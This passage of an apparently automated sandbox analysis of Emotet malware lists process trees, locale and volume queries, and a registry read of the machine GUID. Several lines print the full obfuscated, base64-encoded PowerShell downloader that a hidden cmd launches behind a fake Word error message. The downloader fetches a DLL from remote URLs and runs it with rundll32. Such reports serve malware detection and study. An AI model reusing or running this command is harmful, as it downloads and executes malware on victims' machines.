AnAGMAJwApACwAWwBjAEgAQQBSAF0AOQAyACkAKQA7ACQATQBsADIAOQA0ADYAOQA9ACgAJwBSACcAKwAoACcANgBqACcAKwAnAGsAdQB2AGUAJwApACkAOwAgACAAKAAgACAAVgBBAFIAaQBBAGIATABlACAAMQA2AHYAagAgACAALQB2AEEATABVAEUAbwBuACAAKQA6ADoAIgBzAEUAQwBgAFUAcgBpAHQAeQBwAGAAUgBvAFQAbwBgAGMAbwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABOAGkAbQBoAF8AdQB4AD0AKAAnAEgAZQAnACsAJwB6ACcAKwAoACcAZgB1ACcAKwAnADIAOQAnACkAKQA7ACQATQBlAG0AMAB1AHcAcgAgAD0AIAAoACcATAB5ACcAKwAoACcAZQB0ACcAKwAnAGEANgAnACkAKwAnAHUAZAAnACkAOwAkAEYAagBfAGkAbgB4AGkAPQAoACgAJwBWAHYAJwArACcAMwAnACkAKwAoACcAagBlAGcAJwArACcAOAAnACkAKQA7ACQARwB5AHoAZgA0AGcAOAA9ACgAKAAnAFEANQAnACsAJwA3AHEAdwAnACkAKwAnAGsAJwArACcAegAnACkAOwAkAEMAMAB3ADcAcgBvADYAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAfQBPAF8AdwBnAHEAdgAnACsAJwA3ACcAKwAnAHsAMAAnACsAJwB9ACcAKwAnAEMAJwArACcAMAAzADEANgBlAG0AewAwAH0AJwApACAALQBmACAAWwBDAGgAQQByAF0AOQAyACkAKwAkAE0AZQBtADAAdQB3AHIAKwAoACgAJwAuAGQAJwArACcAbAAnACkAKwAnAGwAJwApADsAJABHAGIAMwBsAHkAawA4AD0AKAAoACcATQB4ACcAKwAnADEAZwAnACkAKwAoACcAZwAnACsAJwBvAG0AJwApACkAOwAkAFIAcAA1ADYAegByAGEAPQBOAEUAVwBgAC0ATwBiAGAASgBlAEMAdAAgAE4AZQBUAC4AVwBFAGIAQwBMAGkARQBuAHQAOwAkAEMAagA1AGsAdwBuAG0APQAoACgAKAAoACcAaAB0AHQAcAA6AHEAcQApACcAKwAnACgAcwAyACcAKwAnACkAKABxAHEAJwArACcAKQAnACkAKQArACcAKAAnACsAKAAoACcAcwAyACcAKwAnACkAKAB6AGUAbgAnACsAJwBpACcAKQApACsAKAAnAHQAaABjACcAKwAnAGEAbQBwAHUAJwArACcAcwAuAGMAJwApACsAKAAoACcAbwAnACsAJwBtAHEAcQApACgAcwAyACcAKwAnACkAJwArACcAKABsAHEAJwArACcAcQApACcAKQApACsAKAAoACcAKABzACcAKQApACsAJwAyACcAKwAoACgAJwApACcAKwAnACgAeQBRACcAKwAnAHEAcQApACgAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAnACkAKQArACgAJwAoAEAAaAB0AHQAJwArACcAcAAnACsAJwA6AHEAJwArACcAcQAnACsAJwApACgAcwAyACkAJwApACsAKAAoACcAKABxACcAKQApACsAK	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\O_wgqv7\C0316em\Lyeta6ud.dll #1	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\O_wgqv7\C0316em\Lyeta6ud.dll #1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yozs\bhycn.bcx',RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Hxqt\iieutea.ehw',RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yjfs\gmxhcr.dhy',RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Hszr\zft.hxn',RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vnjt\awo.cnn',RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Dkpu\lbsvbo.gas',RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Opqf\zrop.pvh',RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Blgp\gmlbr.kph',RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Mnrm\xmfd.ucf',RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Wnoc\mhxywle.szw',RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Xqby\jcrucsb.dql',RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Etxd\pkvco.wzp',RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Eiig\mmslr.ajj',RunDLL

Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD IAAgACQAaQBvAHgASwB5ADIAIAA9ACAAWwB0AFkAUABFAF0AKAAiAHsAMgB9AHsAMAB9AHsAMwB9AHsAMQB9ACIALQBmACcAcwBUAEUAbQAuAGkATwAuAGQAaQBSAGUAYwBUACcALAAnAHkAJwAsACcAUwB5ACcALAAnAE8AcgAnACkAIAA7ACAAcwBFAHQALQBJAHQAZQBNACAAIAB2AGEAUgBpAGEAYgBMAGUAOgAxADYAVgBKACAAIAAoAFsAdABZAFAAZQBdACgAIgB7ADYAfQB7ADcAfQB7ADMAfQB7ADUAfQB7ADAAfQB7ADIAfQB7ADQAfQB7ADEAfQAiACAALQBGACcAVgAnACwAJwByACcALAAnAEkAYwBFAFAAbwBpAE4AJwAsACcATgBlAFQALgBTACcALAAnAFQAbQBhAE4AYQBHAEUAJwAsACcAZQBSACcALAAnAHMAWQBTACcALAAnAHQAZQBtAC4AJwApACAAKQA7ACQASwB0ADMAcwBiAG8AZwA9ACgAJwBCACcAKwAoACcAbQAnACsAJwB2ACcAKwAnAGsAawA5AHIAJwApACkAOwAkAE0AagA1AG4AcAB3AF8APQAkAFoAOQBsAHMANAB6ADYAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEcAMwA1AHcANQAyADQAOwAkAFkAZAAwADgANQByAHgAPQAoACcAVQB4ACcAKwAoACcAZQBlACcAKwAnAF8AJwApACsAJwB3AGwAJwApADsAIAAgACgAIAAgAGcARQB0AC0AaQB0AEUATQAgACgAJwB2AGEAUgBJACcAKwAnAEEAYgBsAEUAJwArACcAOgAnACsAJwBJAG8AWABLAFkAMgAnACkAIAApAC4AVgBBAGwAdQBlADoAOgAiAEMAYABSAEUAYABBAFQAYABlAGAAZABJAFIARQBjAHQATwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAEkARQAnACsAJwBjACcAKQArACcATwAnACsAKAAnAF8AJwArACcAdwBnAHEAJwApACsAJwB2ACcAKwAoACcANwAnACsAJwBJAEUAYwBDADAAMwAxACcAKQArACgAJwA2AGUAbQBJAEUAJwArACcAYwAnACkAKQAgAC0AYwByAEUAcABsAEEAYwBFACAAIAAoACcASQBFACcAKwAnAGMAJwApACwAWwBjAEgAQQBSAF0AOQAyACkAKQA7ACQATQBsADIAOQA0ADYAOQA9ACgAJwBSACcAKwAoACcANgBqACcAKwAnAGsAdQB2AGUAJwApACkAOwAgACAAKAAgACAAVgBBAFIAaQBBAGIATABlACAAMQA2AHYAagAgACAALQB2AEEATABVAEUAbwBuACAAKQA6ADoAIgBzAEUAQwBgAFUAcgBpAHQAeQBwAGAAUgBvAFQAbwBgAGMAbwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABOAGkAbQBoAF8AdQB4AD0AKAAnAEgAZQAnACsAJwB6ACcAKwAoACcAZgB1ACcAKwAnADIAOQAnACkAKQA7ACQATQBlAG0AMAB1AHcAcgAgAD0AIAAoACcATAB5ACcAKwAoACcAZQB0ACcAKwAnAGEANgAnACkAKwAnAHUAZAAnACkAOwAkAEYAagBfAGkAbgB4AGkAPQAoACgAJwBWAHYAJwArACcAMwAnACkAKwAoACcAagBlAGcAJwArACcAOAAnACkAKQA7ACQARwB5AHoAZgA0AGcAOAA9ACgAKAAnAFEANQAnACsAJwA3AHEAdwAnACkAKwAnAGsAJwArACcAegAnACkAOwAkAEMAMAB3ADcAcgBvADYAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAfQBPAF8AdwBnAHEAdgAnACsAJwA3ACcAKwAnAHsAMAAnACsAJwB9ACcAKwAnAEMAJwArACcAMAAzADEANgBlAG0AewAwAH0AJwApACAALQBmACAAWwBDAGgAQQByAF0AOQAyACkAKwAkAE0AZQBtADAAdQB3AHIAKwAoACgAJwAuAGQAJwArACcAbAAnACkAKwAnAGwAJwApADsAJABHAGIAMwBsAHkAawA4AD0AKAAoACcATQB4ACcAKwAnADEAZwAnACkAKwAoACcAZwAnACsAJwBvAG0AJwApACkAOwAkAFIAcAA1ADYAegByAGEAPQBOAEUAVwBgAC0ATwBiAGAASgBlAEMAdAAgAE4AZQBUAC4AVwBFAGIAQwBMAGkARQBuAHQAOwAkAEMAagA1AGsAdwBuAG0APQAoACgAKAAoACcAaAB0AHQAcAA6AHEAcQApACcAKwAnACgAcwAyACcAKwAnACkAKABxAHEAJwArACcAKQAnACkAKQArACcAKAAnACsAKAAoACcAcwAyACcAKwAnACkAKAB6AGUAbgAnACsAJwBpACcAKQApACsAKAAnAHQAaABjACcAKwAnAGEAbQBwAHUAJwArACcAcwAuAGMAJwApACsAKAAoACcAbwAnACsAJwBtAHEAcQApACgAcwAyACcAKwAnACkAJwArACcAKABsAHEAJwArACcAcQApACcAKQApACsAKAAoACcAKABzACcAKQApACsAJwAyACcAKwAoACgAJwApACcAKwAnACgAeQBRACcAKwAnAHEAcQApACgAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAnACkAKQArACgAJwAoAEAAaAB0AHQAJwArACcAcAAnACsAJwA6AHEAJwArA
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAgACQAaQBvAHgASwB5ADIAIAA9ACAAWwB0AFkAUABFAF0AKAAiAHsAMgB9AHsAMAB9AHsAMwB9AHsAMQB9ACIALQBmACcAcwBUAEUAbQAuAGkATwAuAGQAaQBSAGUAYwBUACcALAAnAHkAJwAsACcAUwB5ACcALAAnAE8AcgAnACkAIAA7ACAAcwBFAHQALQBJAHQAZQBNACAAIAB2AGEAUgBpAGEAYgBMAGUAOgAxADYAVgBKACAAIAAoAFsAdABZAFAAZQBdACgAIgB7ADYAfQB7ADcAfQB7ADMAfQB7ADUAfQB7ADAAfQB7ADIAfQB7ADQAfQB7ADEAfQAiACAALQBGACcAVgAnACwAJwByACcALAAnAEkAYwBFAFAAbwBpAE4AJwAsACcATgBlAFQALgBTACcALAAnAFQAbQBhAE4AYQBHAEUAJwAsACcAZQBSACcALAAnAHMAWQBTACcALAAnAHQAZQBtAC4AJwApACAAKQA7ACQASwB0ADMAcwBiAG8AZwA9ACgAJwBCACcAKwAoACcAbQAnACsAJwB2ACcAKwAnAGsAawA5AHIAJwApACkAOwAkAE0AagA1AG4AcAB3AF8APQAkAFoAOQBsAHMANAB6ADYAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEcAMwA1AHcANQAyADQAOwAkAFkAZAAwADgANQByAHgAPQAoACcAVQB4ACcAKwAoACcAZQBlACcAKwAnAF8AJwApACsAJwB3AGwAJwApADsAIAAgACgAIAAgAGcARQB0AC0AaQB0AEUATQAgACgAJwB2AGEAUgBJACcAKwAnAEEAYgBsAEUAJwArACcAOgAnACsAJwBJAG8AWABLAFkAMgAnACkAIAApAC4AVgBBAGwAdQBlADoAOgAiAEMAYABSAEUAYABBAFQAYABlAGAAZABJAFIARQBjAHQATwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAEkARQAnACsAJwBjACcAKQArACcATwAnACsAKAAnAF8AJwArACcAdwBnAHEAJwApACsAJwB2ACcAKwAoACcANwAnACsAJwBJAEUAYwBDADAAMwAxACcAKQArACgAJwA2AGUAbQBJAEUAJwArACcAYwAnACkAKQAgAC0AYwByAEUAcABsAEEAYwBFACAAIAAoACcASQBFACcAKwAnAGMAJwApACwAWwBjAEgAQQBSAF0AOQAyACkAKQA7ACQATQBsADIAOQA0ADYAOQA9ACgAJwBSACcAKwAoACcANgBqACcAKwAnAGsAdQB2AGUAJwApACkAOwAgACAAKAAgACAAVgBBAFIAaQBBAGIATABlACAAMQA2AHYAagAgACAALQB2AEEATABVAEUAbwBuACAAKQA6ADoAIgBzAEUAQwBgAFUAcgBpAHQAeQBwAGAAUgBvAFQAbwBgAGMAbwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABOAGkAbQBoAF8AdQB4AD0AKAAnAEgAZQAnACsAJwB6ACcAKwAoACcAZgB1ACcAKwAnADIAOQAnACkAKQA7ACQATQBlAG0AMAB1AHcAcgAgAD0AIAAoACcATAB5ACcAKwAoACcAZQB0ACcAKwAnAGEANgAnACkAKwAnAHUAZAAnACkAOwAkAEYAagBfAGkAbgB4AGkAPQAoACgAJwBWAHYAJwArACcAMwAnACkAKwAoACcAagBlAGcAJwArACcAOAAnACkAKQA7ACQARwB5AHoAZgA0AGcAOAA9ACgAKAAnAFEANQAnACsAJwA3AHEAdwAnACkAKwAnAGsAJwArACcAegAnACkAOwAkAEMAMAB3ADcAcgBvADYAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAfQBPAF8AdwBnAHEAdgAnACsAJwA3ACcAKwAnAHsAMAAnACsAJwB9ACcAKwAnAEMAJwArACcAMAAzADEANgBlAG0AewAwAH0AJwApACAALQBmACAAWwBDAGgAQQByAF0AOQAyACkAKwAkAE0AZQBtADAAdQB3AHIAKwAoACgAJwAuAGQAJwArACcAbAAnACkAKwAnAGwAJwApADsAJABHAGIAMwBsAHkAawA4AD0AKAAoACcATQB4ACcAKwAnADEAZwAnACkAKwAoACcAZwAnACsAJwBvAG0AJwApACkAOwAkAFIAcAA1ADYAegByAGEAPQBOAEUAVwBgAC0ATwBiAGAASgBlAEMAdAAgAE4AZQBUAC4AVwBFAGIAQwBMAGkARQBuAHQAOwAkAEMAagA1AGsAdwBuAG0APQAoACgAKAAoACcAaAB0AHQAcAA6AHEAcQApACcAKwAnACgAcwAyACcAKwAnACkAKABxAHEAJwArACcAKQAnACkAKQArACcAKAAnACsAKAAoACcAcwAyACcAKwAnACkAKAB6AGUAbgAnACsAJwBpACcAKQApACsAKAAnAHQAaABjACcAKwAnAGEAbQBwAHUAJwArACcAcwAuAGMAJwApACsAKAAoACcAbwAnACsAJwBtAHEAcQApACgAcwAyACcAKwAnACkAJwArACcAKABsAHEAJwArACcAcQApACcAKQApACsAKAAoACcAKABzACcAKQApACsAJwAyACcAKwAoACgAJwApACcAKwAnACgAeQBRACcAKwAnAHEAcQApACgAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAnACkAKQArACgAJwAoAEAAaAB0AHQAJwArACcAcAAnACsAJwA6AHEAJwArACcAcQAnACsAJwApACgAcwAyACkAJwApACsAKAAoACcAKABxACcAKQApACsAK
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAgACQAaQBvAHgASwB5ADIAIAA9ACAAWwB0AFkAUABFAF0AKAAiAHsAMgB9AHsAMAB9AHsAMwB9AHsAMQB9ACIALQBmACcAcwBUAEUAbQAuAGkATwAuAGQAaQBSAGUAYwBUACcALAAnAHkAJwAsACcAUwB5ACcALAAnAE8AcgAnACkAIAA7ACAAcwBFAHQALQBJAHQAZQBNACAAIAB2AGEAUgBpAGEAYgBMAGUAOgAxADYAVgBKACAAIAAoAFsAdABZAFAAZQBdACgAIgB7ADYAfQB7ADcAfQB7ADMAfQB7ADUAfQB7ADAAfQB7ADIAfQB7ADQAfQB7ADEAfQAiACAALQBGACcAVgAnACwAJwByACcALAAnAEkAYwBFAFAAbwBpAE4AJwAsACcATgBlAFQALgBTACcALAAnAFQAbQBhAE4AYQBHAEUAJwAsACcAZQBSACcALAAnAHMAWQBTACcALAAnAHQAZQBtAC4AJwApACAAKQA7ACQASwB0ADMAcwBiAG8AZwA9ACgAJwBCACcAKwAoACcAbQAnACsAJwB2ACcAKwAnAGsAawA5AHIAJwApACkAOwAkAE0AagA1AG4AcAB3AF8APQAkAFoAOQBsAHMANAB6ADYAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEcAMwA1AHcANQAyADQAOwAkAFkAZAAwADgANQByAHgAPQAoACcAVQB4ACcAKwAoACcAZQBlACcAKwAnAF8AJwApACsAJwB3AGwAJwApADsAIAAgACgAIAAgAGcARQB0AC0AaQB0AEUATQAgACgAJwB2AGEAUgBJACcAKwAnAEEAYgBsAEUAJwArACcAOgAnACsAJwBJAG8AWABLAFkAMgAnACkAIAApAC4AVgBBAGwAdQBlADoAOgAiAEMAYABSAEUAYABBAFQAYABlAGAAZABJAFIARQBjAHQATwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAEkARQAnACsAJwBjACcAKQArACcATwAnACsAKAAnAF8AJwArACcAdwBnAHEAJwApACsAJwB2ACcAKwAoACcANwAnACsAJwBJAEUAYwBDADAAMwAxACcAKQArACgAJwA2AGUAbQBJAEUAJwArACcAYwAnACkAKQAgAC0AYwByAEUAcABsAEEAYwBFACAAIAAoACcASQBFACcAKwAnAGMAJwApACwAWwBjAEgAQQBSAF0AOQAyACkAKQA7ACQATQBsADIAOQA0ADYAOQA9ACgAJwBSACcAKwAoACcANgBqACcAKwAnAGsAdQB2AGUAJwApACkAOwAgACAAKAAgACAAVgBBAFIAaQBBAGIATABlACAAMQA2AHYAagAgACAALQB2AEEATABVAEUAbwBuACAAKQA6ADoAIgBzAEUAQwBgAFUAcgBpAHQAeQBwAGAAUgBvAFQAbwBgAGMAbwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABOAGkAbQBoAF8AdQB4AD0AKAAnAEgAZQAnACsAJwB6ACcAKwAoACcAZgB1ACcAKwAnADIAOQAnACkAKQA7ACQATQBlAG0AMAB1AHcAcgAgAD0AIAAoACcATAB5ACcAKwAoACcAZQB0ACcAKwAnAGEANgAnACkAKwAnAHUAZAAnACkAOwAkAEYAagBfAGkAbgB4AGkAPQAoACgAJwBWAHYAJwArACcAMwAnACkAKwAoACcAagBlAGcAJwArACcAOAAnACkAKQA7ACQARwB5AHoAZgA0AGcAOAA9ACgAKAAnAFEANQAnACsAJwA3AHEAdwAnACkAKwAnAGsAJwArACcAegAnACkAOwAkAEMAMAB3ADcAcgBvADYAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAfQBPAF8AdwBnAHEAdgAnACsAJwA3ACcAKwAnAHsAMAAnACsAJwB9ACcAKwAnAEMAJwArACcAMAAzADEANgBlAG0AewAwAH0AJwApACAALQBmACAAWwBDAGgAQQByAF0AOQAyACkAKwAkAE0AZQBtADAAdQB3AHIAKwAoACgAJwAuAGQAJwArACcAbAAnACkAKwAnAGwAJwApADsAJABHAGIAMwBsAHkAawA4AD0AKAAoACcATQB4ACcAKwAnADEAZwAnACkAKwAoACcAZwAnACsAJwBvAG0AJwApACkAOwAkAFIAcAA1ADYAegByAGEAPQBOAEUAVwBgAC0ATwBiAGAASgBlAEMAdAAgAE4AZQBUAC4AVwBFAGIAQwBMAGkARQBuAHQAOwAkAEMAagA1AGsAdwBuAG0APQAoACgAKAAoACcAaAB0AHQAcAA6AHEAcQApACcAKwAnACgAcwAyACcAKwAnACkAKABxAHEAJwArACcAKQAnACkAKQArACcAKAAnACsAKAAoACcAcwAyACcAKwAnACkAKAB6AGUAbgAnACsAJwBpACcAKQApACsAKAAnAHQAaABjACcAKwAnAGEAbQBwAHUAJwArACcAcwAuAGMAJwApACsAKAAoACcAbwAnACsAJwBtAHEAcQApACgAcwAyACcAKwAnACkAJwArACcAKABsAHEAJwArACcAcQApACcAKQApACsAKAAoACcAKABzACcAKQApACsAJwAyACcAKwAoACgAJwApACcAKwAnACgAeQBRACcAKwAnAHEAcQApACgAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAnACkAKQArACgAJwAoAEAAaAB0AHQAJwArACcAcAAnACsAJwA6AHEAJwArACcAcQAnACsAJwApACgAcwAyACkAJwApACsAKAAoACcAKABxACcAKQApACsAK	Jump to behavior

Language, Device and Operating System Detection:

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,_free,_free,	7_2_10016021
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,	7_2_10018026
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s,	7_2_10018090
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,__invoke_watson,_LcidFromHexString,GetLocaleInfoW,	7_2_100178A6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	7_2_100150C4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	7_2_10016A2B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _LcidFromHexString,GetLocaleInfoW,	7_2_10017A6A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	7_2_1000DADD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,	7_2_1000DB1A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	7_2_10017B1A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_memmove,_memmove,_memmove,_free,_free,_free,_free,_free,_free,_free,_free,_free,	7_2_1000A33F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _GetPrimaryLen,EnumSystemLocalesW,	7_2_10017B5A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _GetPrimaryLen,EnumSystemLocalesW,	7_2_10017BD7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free,	7_2_10016429
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage,	7_2_10017C5A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson,	7_2_1000DD4A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,	7_2_10017E4F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP,	7_2_10017F79

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 7_2_10010D9C GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

7_2_10010D9C

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected Emotet

Show sources

